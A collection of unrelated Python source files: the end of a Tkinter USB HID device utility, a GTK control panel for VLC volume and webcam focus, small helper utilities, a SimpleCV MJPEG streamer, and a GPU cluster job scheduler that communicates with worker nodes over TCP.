w = tk.Checkbutton(frame,state=tk.DISABLED)
# global ignore_red
# ignore_red = w
global ignore_red_handle_checkbutton
ignore_red_handle_checkbutton = w
w.grid(row=row,column=2)
row += 1
# Seperator
row = my_seperator(frame, row)
# Counter
ttk.Label(frame,text="PacketsCounter:").grid(row=row,column=0,sticky=tk.E,)
w = ttk.Entry(frame,width=20,
# """state=tk.DISABLED"""
)
global counter_entry
counter_entry = w
w.grid(padx=10,pady=5,row=row,column=1,columnspan=2,sticky=tk.W,)
# HID_Util Fault indication
ttk.Label(frame,text="Faultindication:").grid(row=row,column=1,sticky=tk.E,)
w = ttk.Entry(
frame,
width=20,
)
global fault_entry
fault_entry = w
w.grid(
padx=10,
pady=5,
row=row,
column=2,
columnspan=2,
sticky=tk.W,
)
row += 1
# Seperator
row = my_seperator(frame, row)
# sleepTimer
ttk.Label(
frame,
text="Sleep Timer"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="sleepTimer"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
# Seperator
row = my_seperator(frame, row)
# battery level
ttk.Label(
frame,
text="battery level"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="batteryLevel"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
# Seperator
row = my_seperator(frame, row)
# Motor Cur
ttk.Label(
frame,
text="Motor Current"
).grid(
row=row,
column=0,
sticky=tk.E,
)
w = ttk.Progressbar(
frame,
orient=tk.HORIZONTAL,
length=LONG_PROGRESS_BAR_LEN,
style="motorCurrent"
)
progressbars.append(w)
w.grid(
row=row,
column=1,
columnspan=3
)
row += 1
# Seperator
row = my_seperator(frame, row)
red_handle_ignore = tk.Button(frame,text ="Get Board Type",command = board_type_button_callback)
red_handle_ignore.grid(row=row,column=0)
red_handle_ignore = tk.Button(frame,text ="Keep alive (fast BLE)",command = alive_button_CallBack)
red_handle_ignore.grid(row=row,column=1)
red_handle_ignore = tk.Button(frame,text ="Moderate BLE",command = moderate_button_CallBack)
red_handle_ignore.grid(row=row,column=2)
row += 1
row = my_seperator(frame, row)
red_handle_ignore = tk.Button(frame,text ="BSL !!!(DONT PRESS)",command = BSL_mode_button_CallBack)
red_handle_ignore.grid(row=row,column=2)
def init_parser():
parser = argparse.ArgumentParser(
description="Read the HID data from target board.\nIf no argument is given, the program exits."
)
parser.add_argument(
"-v", "--vendor",
dest="vendor_id",
metavar="VENDOR_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with the vendor ID"
)
parser.add_argument(
"-p", "--product",
dest="product_id",
metavar="PRODUCT_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with that product ID"
)
parser.add_argument(
"-a", "--path",
dest="path",
metavar="PATH",
type=str,
nargs=1,
required=False,
help="connects to the device with the given path"
)
return parser
def main():
global VENDOR_ID
global PRODUCT_ID
PATH = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w")
# Parse the command line arguments
parser = init_parser()
args = parser.parse_args(sys.argv[1:])
# Initialize the flags according from the command line arguments
avail_vid = args.vendor_id != None
avail_pid = args.product_id != None
avail_path = args.path != None
id_mode = avail_pid and avail_vid
path_mode = avail_path
default_mode = (not avail_vid) and (not avail_pid) and (not avail_path)
if (path_mode and (avail_pid or avail_vid)):
print("The path argument can't be mixed with the ID arguments")
return
if ((not avail_path) and ((avail_pid and (not avail_vid)) or ((not avail_pid) and avail_vid))):
print("Both the product ID and the vendor ID must be given as arguments")
return
if (default_mode):
print("No arguments were given, defaulting to:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
id_mode = True
elif (id_mode):
VENDOR_ID = args.vendor_id[0]
PRODUCT_ID = args.product_id[0] #run over with 772 == 0x304
elif (path_mode):
PATH = args.path[0]
else:
raise NotImplementedError
device = None
try:
if (id_mode):
try:
print("try with default device:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
except:
print("wrong ID")
print(" ")
# 0x24B3 = 9395
# 0x2005 = 8197
for n in range(7):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simbionix
PRODUCT_ID = 0x2000 + n # LAP_NEW_CAMERA. is 0x2005
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID2")
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simbionix
PRODUCT_ID = PRODUCT_ID_CTAG
print("try with PID = %X " % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
if device is not None:
device.write(DEFAULT_WRITE_DATA)
except:
print("wrong ID3")
# VENDOR_ID = 2047
# PRODUCT_ID = 304
# 0x2047 = 8263
# 0x304 = 772
# 0x0301 // Product ID (PID) - base for Prime products family
for n in range(len(PRODUCT_ID_types)):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x2047 # Texas Instrument
PRODUCT_ID = 0x301 + n # BOARD_TYPE_MAIN is 0x301
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID4")
if device is None:
print("no device attached")
else:
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
global special_cmd
if PRODUCT_ID in PRODUCT_ID_types:
print(PRODUCT_ID_types[PRODUCT_ID])
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
if PRODUCT_ID in PRODUCT_ID_types:
special_cmd = 'B'
# root. destroy()
elif PRODUCT_ID == PRODUCT_ID_CTAG:
print("BOARD_TYPE: CTAG --- new in bsl.exe")
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
if PRODUCT_ID in PRODUCT_ID_types:
special_cmd = 'B'
elif (path_mode):
device = hid.Device(path=PATH)
else:
raise NotImplementedError
# # Initialize the main window
# global root
# root = tk.Tk()
# root.title("HID_Util")
#
# # Initialize the GUI widgets
# my_widgets(root)
# Create thread that calls
threading.Thread(target=gui_loop, args=(device,), daemon=True).start()
global WRITE_DATA
if WRITE_DATA == WRITE_DATA_CMD_B:
print("WRITE_DATA == WRITE_DATA_CMD_B")
# threading.Thread(target=gui_loop, args=(device,), daemon=True).stop()
print(" Recording Ended !!!")
print(" ")
print(" Please press <Enter> to Exit")
input()
# Run the GUI main loop
# root.mainloop()
finally:
# global file1
# file1.close() #to change file access modes
if device != None:
device.close()
if __name__ == "__main__":
main()
|
BioBox.py
|
import sys
import time
import subprocess
import socket
import threading
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, GLib
try:
from Analog import read_value
except (ImportError, NotImplementedError): # Provide a dummy for testing
def read_value():
yield 0
selected_channel = None
class MainUI(Gtk.Window):
def __init__(self):
super().__init__(title="Bio Box")
self.set_border_width(10)
modules = Gtk.Box()
self.add(modules)
global chan_select
chan_select = Gtk.RadioButton()
threading.Thread(target=self.read_analog, daemon=True).start()
vlcmodule = VLC(chan_select)
modules.pack_start(vlcmodule, True, True, 0)
c922module = WebcamFocus(chan_select)
modules.pack_start(c922module, True, True, 0)
def read_analog(self):
# Get analog value from Analog.py and write to selected channel's slider
for volume in read_value():
if selected_channel:
print("From slider:", volume)
# TODO: Scale 0-100% to 0-150%
GLib.idle_add(selected_channel.update_position, volume)
class Channel(Gtk.Frame):
mute_labels = ("Mute", "Muted")
def __init__(self, name, chan_select):
super().__init__(label=name, shadow_type=Gtk.ShadowType.ETCHED_IN)
# Box stuff
box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
box.set_size_request(50, 300)
self.add(box)
self.channel_name = name
#channel_label = Gtk.Label(label=self.channel_name)
#box.pack_start(channel_label, False, False, 0)
# Slider stuff
self.slider = Gtk.Adjustment(value=100, lower=0, upper=150, step_increment=1, page_increment=10, page_size=0)
level = Gtk.Scale(orientation=Gtk.Orientation.VERTICAL, adjustment=self.slider, inverted=True, draw_value=False)
level.add_mark(value=100, position=Gtk.PositionType.LEFT, markup=None)
level.add_mark(value=100, position=Gtk.PositionType.RIGHT, markup=None)
box.pack_start(level, True, True, 0)
level.connect("focus", self.focus_delay)
self.slider.connect("value-changed", self.refract_value)
# Spinner
spinvalue = Gtk.SpinButton(adjustment=self.slider)
box.pack_start(spinvalue, False, False, 0)
spinvalue.connect("focus", self.focus_delay) # TODO: get signal for +/- presses
# Mute button
self.mute = Gtk.ToggleButton(label=self.mute_labels[0])
box.pack_start(self.mute, False, False, 0)
self.mute.connect("toggled", self.muted)
self.mute.connect("focus", self.focus_delay)
# Channel selector
self.selector = Gtk.RadioButton.new_from_widget(chan_select)
self.selector.set_label("Selected")
box.pack_start(self.selector, False, False, 0)
self.selector.connect("toggled", self.check_selected)
self.connect("event", self.click_anywhere)
def focus_delay(self, widget, direction):
GLib.idle_add(self.focus_select, widget)
def focus_select(self, widget):
if widget.is_focus():
self.selector.set_active(True)
print(self.channel_name, "selected")
def click_anywhere(self, widget, event):
if "BUTTON" in event.get_event_type().value_name:
self.selector.set_active(True)
return False
elif event.get_event_type().value_name != "GDK_MOTION_NOTIFY":
print(event.get_event_type().value_name)
def check_selected(self, widget):
global selected_channel
if widget.get_active():
selected_channel = self
print(selected_channel.channel_name)
def refract_value(self, widget):
# Send adjustment value to multiple places - one will echo back
# to the source of the change, any others are echoing forward,
# hence 'refraction'.
value = round(widget.get_value())
self.write_external(value)
self.write_analog(value)
def write_analog(self, value):
pass
def read_external(self, level_cmd, mute_cmd):
buffer = b""
while True:
data = self.data_source()
if not data:
break
buffer += data
while b"\n" in buffer:
line, buffer = buffer.split(b"\n", 1)
line = line.rstrip().decode("utf-8")
attr, value = line.split(":", 1)
if attr == level_cmd:
value = int(value)
GLib.idle_add(self.update_position, value)
elif attr == mute_cmd:
GLib.idle_add(self.mute.set_active, int(value))
else:
print(attr, value)
# Fallback function if subclasses don't provide write_external()
def write_external(self, value):
print(value)
# Fallback/superclass function
def muted(self, widget):
mute_state = widget.get_active()
self.mute.set_label(self.mute_labels[mute_state])
print("Channel " + "un" * (not mute_state) + "muted")
return mute_state
class VLC(Channel):
def __init__(self, chan_select):
super().__init__(name="VLC", chan_select=chan_select)
self.sock = None
threading.Thread(target=self.conn, daemon=True).start()
self.last_wrote = time.monotonic()
def conn(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.sock.connect(('localhost',4221))
except ConnectionRefusedError:
self.sock = None
return
self.sock.send(b"volume\r\nmuted\r\n") # Ask volume and mute state
with self.sock:
self.read_external("volume", "muted")
self.sock = None # TODO: Disable channel in GUI if no connection
def data_source(self):
if self.sock:
return self.sock.recv(1024)
else:
return b""
def write_external(self, value):
if self.sock:
if time.monotonic() > self.last_wrote + 0.01: # TODO: drop only writes that would result in bounce loop
self.sock.send(b"volume %d \r\n" %value)
print("To VLC: ", value)
def update_position(self, value):
self.slider.set_value(value)
self.last_wrote = time.monotonic()
def muted(self, widget):
if self.sock:
mute_state = super().muted(widget)
self.sock.send(b"muted %d \r\n" %mute_state)
print("VLC Mute status:", mute_state)
class WebcamFocus(Channel):
mute_labels = ("AF Off", "AF On")
def __init__(self, chan_select):
super().__init__(name="C922 Focus", chan_select=chan_select)
threading.Thread(target=self.conn, daemon=True).start()
# TODO: use 'quit' command in camera.py
def conn(self):
self.ssh = subprocess.Popen(["ssh", "-oBatchMode=yes", "biobox@F-22Raptor", "python3", "/home/stephen/BioBox/camera.py"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# TODO: If the process fails, disable the channel (eg if authentication fails)
# Check camera state (auto-focus, focal distance)
self.ssh.stdin.write(("cam_check\n").encode("utf-8"))
self.ssh.stdin.flush()
self.read_external("focus_absolute", "focus_auto")
def data_source(self):
return self.ssh.stdout.read1(1024)
def write_external(self, value):
if not self.mute.get_active():
self.ssh.stdin.write(("focus_absolute %d\n" %value).encode("utf-8"))
self.ssh.stdin.flush()
def update_position(self, value):
self.slider.set_value(value)
def muted(self, widget):
mute_state = super().muted(widget)
self.ssh.stdin.write(("focus_auto %d\n" %mute_state).encode("utf-8"))
self.ssh.stdin.flush()
print("C922 Autofocus " + ("Dis", "En")[mute_state] + "abled")
self.write_external(round(self.slider.get_value()))
if __name__ == "__main__":
win = MainUI()
win.connect("destroy", Gtk.main_quit)
win.show_all()
Gtk.main()
|
utils.py
|
# Collection of helper functions and classes
# msgEvent could probably be put in here as well, actually...
import threading,time,socket
# simple module to repeat any job every <delay> seconds
# The scheduling library does this really well but is pretty overkill -- if you need
# more functionality in the future consider swapping over to it
# but this is honestly enough for most of the things that are required
class job():
def __init__(self, target, delay):
self.target = target
self.delay = delay
self.running = False
# start the repeatable job --- YOUR JOB WILL NEVER RUN IF THIS FUNCTION IS NOT CALLED
def start(self):
self.running = True
self.repeater = threading.Thread(target=self.rerun, daemon=True).start()
# responsible for the actual act of repeating -- should never be explicitly called
def rerun(self):
while self.running:
time.sleep(self.delay)
self.target()
# idk why you'd ever want to pause a job but there you have it
def pause(self):
self.running = False #boolean assignment is atomic so we don't have anything to worry aobut
# The only way I've managed to get my own IP
# There are easier ways but they are OS specific whereas this one always works (but is a little slower)
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
|
Stream.py
|
from SimpleCV.base import *
_jpegstreamers = {}
class JpegStreamHandler(SimpleHTTPRequestHandler):
"""
The JpegStreamHandler handles requests to the threaded HTTP server.
Once initialized, any request to this port will receive a multipart/replace
jpeg.
"""
def do_GET(self):
global _jpegstreamers
if (self.path == "/" or not self.path):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write("""
<html>
<head>
<style type=text/css>
body { background-image: url(/stream); background-repeat:no-repeat; background-position:center top; background-attachment:fixed; height:100% }
</style>
</head>
<body>
</body>
</html>
""")
return
elif (self.path == "/stream"):
self.send_response(200)
self.send_header("Connection", "close")
self.send_header("Max-Age", "0")
self.send_header("Expires", "0")
self.send_header("Cache-Control", "no-cache, private")
self.send_header("Pragma", "no-cache")
self.send_header("Content-Type", "multipart/x-mixed-replace; boundary=--BOUNDARYSTRING")
self.end_headers()
(host, port) = self.server.socket.getsockname()[:2]
count = 0
timeout = 0.75
lasttimeserved = 0
while (1):
if (_jpegstreamers[port].refreshtime > lasttimeserved or time.time() - timeout > lasttimeserved):
try:
self.wfile.write("--BOUNDARYSTRING\r\n")
self.send_header("Content-type", "image/jpeg")
self.send_header("Content-Length", str(len(_jpegstreamers[port].jpgdata.getvalue())))
self.end_headers()
self.wfile.write(_jpegstreamers[port].jpgdata.getvalue() + "\r\n")
lasttimeserved = time.time()
except socket.error, e:
return
except IOError, e:
return
count = count + 1
time.sleep(_jpegstreamers[port].sleeptime)
class JpegTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
#factory class for jpegtcpservers
class JpegStreamer():
"""
The JpegStreamer class allows the user to stream a jpeg encoded file
to a HTTP port. Any updates to the jpg file will automatically be pushed
to the browser via multipart/replace content type.
To initialize:
js = JpegStreamer()
to update:
img.save(js)
to open a browser and display:
import webbrowser
webbrowser.open(js.url)
Note 3 optional parameters on the constructor:
- port (default 8080) which sets the TCP port you need to connect to
- sleep time (default 0.1) how often to update. Above 1 second seems to cause dropped connections in Google chrome
Once initialized, the buffer and sleeptime can be modified and will function properly -- port will not.
"""
server = ""
host = ""
port = ""
sleeptime = ""
framebuffer = ""
counter = 0
refreshtime = 0
def __init__(self, hostandport = 8080, st=0.1 ):
global _jpegstreamers
if (type(hostandport) == int):
self.port = hostandport
self.host = "localhost"
elif (isinstance(hostandport, basestring) and re.search(":", hostandport)):
(self.host, self.port) = hostandport.split(":")
self.port = int(self.port)
elif (type(hostandport) == tuple):
(self.host, self.port) = hostandport
self.sleeptime = st
self.server = JpegTCPServer((self.host, self.port), JpegStreamHandler)
self.server_thread = threading.Thread(target = self.server.serve_forever)
_jpegstreamers[self.port] = self
self.server_thread.daemon = True
self.server_thread.start()
self.framebuffer = self #self referential, ugh. but gives some bkcompat
def url(self):
"""
Returns the JpegStreams Webbrowser-appropriate URL, if not provided in the constructor, it defaults to "http://localhost:8080"
"""
return "http://" + self.host + ":" + str(self.port) + "/"
def streamUrl(self):
"""
Returns the URL of the MJPEG stream. If host and port are not set in the constructor, defaults to "http://localhost:8080/stream/"
"""
return self.url() + "stream"
class VideoStream():
"""
The VideoStream lets you save video files in a number of different formats.
You can initialize it by specifying the file you want to output::
vs = VideoStream("hello.avi")
You can also specify a framerate, and if you want to "fill" in missed frames.
So if you want to record a realtime video you may want to do this::
vs = VideoStream("myvideo.avi", 25, True) #note these are default values
Where if you want to do a stop-motion animation, you would want to turn fill off::
vs_animation = VideoStream("cartoon.avi", 15, False)
If you select a fill, the VideoStream will do its best to stay close to "real time" by duplicating frames or dropping frames when the clock doesn't sync up
with the file writes.
You can save a frame to the video by using the Image.save() function::
my_camera.getImage().save(vs)
"""
fps = 25
filename = ""
writer = ""
fourcc = ""
framefill = True
videotime = 0.0
starttime = 0.0
framecount = 0
def __init__(self, filename, fps = 25, framefill = True):
(revextension, revname) = filename[::-1].split(".")
extension = revextension[::-1]
self.filename = filename
self.fps = fps
self.framefill = framefill
#if extension == "mpg":
self.fourcc = cv.CV_FOURCC('I', 'Y', 'U', 'V')
#self.fourcc = 0
#else:
# logger.warning(extension + " is not supported for video writing on this platform, sorry");
# return False
def initializeWriter(self, size):
self.writer = cv.CreateVideoWriter(self.filename, self.fourcc, self.fps, size, 1)
self.videotime = 0.0
self.starttime = time.time()
def writeFrame(self, img):
"""
This writes a frame to the display object
this is automatically called by image.save() but you can
use this function to save just the bitmap as well so
image markup is not implicit,typically you use image.save() but
this allows for more finer control
"""
if not self.writer:
self.initializeWriter(img.size())
self.lastframe = img
frametime = 1.0 / float(self.fps)
targettime = self.starttime + frametime * self.framecount
realtime = time.time()
if self.framefill:
#see if we need to do anything to adjust to real time
if (targettime > realtime + frametime):
#if we're more than one frame ahead
#save the lastframe, but don't write to videoout
self.lastframe = img
return
elif (targettime < realtime - frametime):
#we're at least one frame behind
framesbehind = int((realtime - targettime) * self.fps) + 1
#figure out how many frames behind we are
lastframes = framesbehind / 2
for i in range(0, lastframes):
self.framecount += 1
cv.WriteFrame(self.writer, self.lastframe.getBitmap())
theseframes = framesbehind - lastframes
for i in range(0, theseframes):
self.framecount += 1
cv.WriteFrame(self.writer, img.getBitmap())
#split missing frames evenly between the prior and current frame
else: #we are on track
self.framecount += 1
cv.WriteFrame(self.writer, img.getBitmap())
else:
cv.WriteFrame(self.writer, img.getBitmap())
self.framecount += 1
self.lastframe = img
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
PJCT = {} # practical complete time, not applicable for all jobs
PJCT_epoch = {}
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
index = 0
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
qualified_jobs = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
all_job = []
qualified_job = []
pc_job = [] # list of jobs that are pratically completed
K80_node = 'c2180'
V100_node = 'd1020'
host_node = 'c0168'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
QUALIFY_TIME = 300 # 600s or 10min as threshold
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
def max_param_promotion(K80_free, V100_free, V100_job, promote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
V100_vacant = num_demote + V100_free
K80_vacant = num_promote + K80_free
global param_dict
if K80_vacant >= num_demote: # if more vacant K80s than demote jobs, always demote
# selectively promote among active V100 jobs and promote list jobs
V100_qual = list(set(list(V100_job.values())) - set(force_demote))
if 'idle' in V100_qual:
V100_qual.remove('idle')
V100_pool = list(set(V100_qual).union(promote_list))
if len(V100_pool) <= 4: # promote all jobs as well
return promote_list, force_demote
else: # promote the top 4 jobs
pool_dict = {}
for job in V100_pool:
if 'job'+job in param_dict:
pool_dict[job] = param_dict['job'+job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:4]
promotion_list = list(set(promote_list).intersection(sorted_pool))
demotion_list = list(set(list(V100_job.values())).difference(sorted_pool))
if 'idle' in demotion_list:
demotion_list.remove('idle') # this includes force demotion
return promotion_list, demotion_list
elif V100_vacant >= num_promote: # if more vacant V100s than promote jobs, always promote
# less vacant K80s than demote jobs, select worst among force demote list
pool_dict = {} # here the pool only includes force demote jobs
for job in force_demote:
if 'job'+job in param_dict:
pool_dict[job] = param_dict['job'+job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_vacant]
return promote_list, sorted_pool
else:
raise ValueError('Bug with max param promotion, condition not considered')
#a, b = max_param_promotion(1, 1, {0: '49', 1: '39', 2: '50', 3: 'idle'}, ['40', '37'], [])
#c, d = max_param_promotion(1, 1, {0: 'idle', 1: 'idle', 2: 'idle', 3: 'idle'}, [], [])
#e, f = max_param_promotion(1, 1, {'0': '49', '1': '39', '2': '50', '3': 'idle'}, ['40', '37'], [])
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
send_signal(node, 'save ' + job)
global ovhd_start
global pc_job
#if job not in pc_job:
ovhd_start[job] = time.time()
# after sending checkpoint signal, wait for it to finish
while True:
time.sleep(5)
with open('checkpoint.json', 'r') as fp2:
checkpoint_dict = json.load(fp2)
if checkpoint_dict['job'+job] == 1: # checkpoint has finished
print('checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp2:
fp2.write(json_file)
break
# also check if job has already finished
global finish_dict
if finish_dict['job'+job] == 1:
break
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
# start job
def start_job(node, gpu, job):
# first wait for pid.json to show up, rename pid.json to pid_lock.json
# then in jobx.py, modify pid_lock.json, rename it to pid.json
# then wait for pid.json to show up
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
# function that checks the tensorboard log of currently running jobs and logs practical complete jobs in a global list
# once a job reaches practical complete, it cannot be promoted. If it's already promoted, it gets demoted.
# criteria for practical complete: loss improvement has been smaller than 0.01 for last 3 consecutive epochs
def check_practical_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
threshold = 0.001
global pc_job
global PJCT
global PJCT_epoch
for job in job_list:
# only check for job outside of practical complete job list
if job not in pc_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
loss_combine = []
for tc in dirs:
iterator = EventAccumulator(tc).Reload()
if len(iterator.Tags()['scalars']) > 0:
tag = 'loss' #iterator.Tags()['scalars'][2] # this is tag for loss
loss = [item.value for item in iterator.Scalars(tag)]
loss_combine += loss
# now that we have the loss at each epoch, we can check if it has reached practical complete
if len(loss_combine) >= 4:
latest_loss = loss_combine[-4:]
finished = True
for i in range(3):
# if the difference is >= 0.01, the job has not reached practical complete yet
if latest_loss[i] - latest_loss[i+1] >= threshold:
finished = False
break
if finished:
print('job' + job + ' has reached practical complete, the last 4 loss values are')
print(str(latest_loss))
pc_job.append(job)
PJCT[job] = int(time.time() - job_start[job])
PJCT_epoch[job] = len(loss_combine)
############### first clear finish status of all jobs ####################
pid_dict = {}
with open('pid.json', 'r') as fp:
pid_dict = json.load(fp)
for key in pid_dict:
pid_dict[key] = 0
json_file = json.dumps(pid_dict)
with open('pid.json', 'w') as fp:
fp.write(json_file)
checkpoint_dict = {}
with open('checkpoint.json', 'r') as fp:
checkpoint_dict = json.load(fp)
for key in checkpoint_dict:
checkpoint_dict[key] = 0
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp:
fp.write(json_file)
# initialize all parameters to 0
param_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
param_dict[job_name] = 0
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
for key in epoch_waste_dict:
epoch_waste_dict[key] = 0
json_file = json.dumps(epoch_waste_dict)
with open('epoch_waste.json', 'w') as fp:
fp.write(json_file)
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
if 'param' in data_str:
global param_dict
job_name = data_str.split(' ')[0]
param_num = int(data_str.split(' ')[2])
param_dict[job_name] = param_num
elif 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
finish_dict[job_name] = 1
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
JCT[job] = int(time.time() - job_start[job])
elif ovhd_start[job] != 0:
# check if ckpt overhead has finished
if ckpt_qual_dict['job'+job] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
JCT[job] = int(time.time() - job_start[job])
elif ovhd_start[job] != 0:
# check if ckpt overhead has finished
if ckpt_qual_dict['job'+job] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
################ check for practical finished jobs on K80 and V100 ######################
all_job = list(K80_job.values()) + list(V100_job.values())
check_practical_complete(all_job)
################ check run time of current K80 job, update qualified_job #################
for job in list(K80_job.values()):
if job not in qualified_job and job != 'idle':
runtime = int(time.time() - job_start[job])
if runtime >= QUALIFY_TIME:
qualified_job.append(job)
print('job' + job + ' has been qualified for promotion')
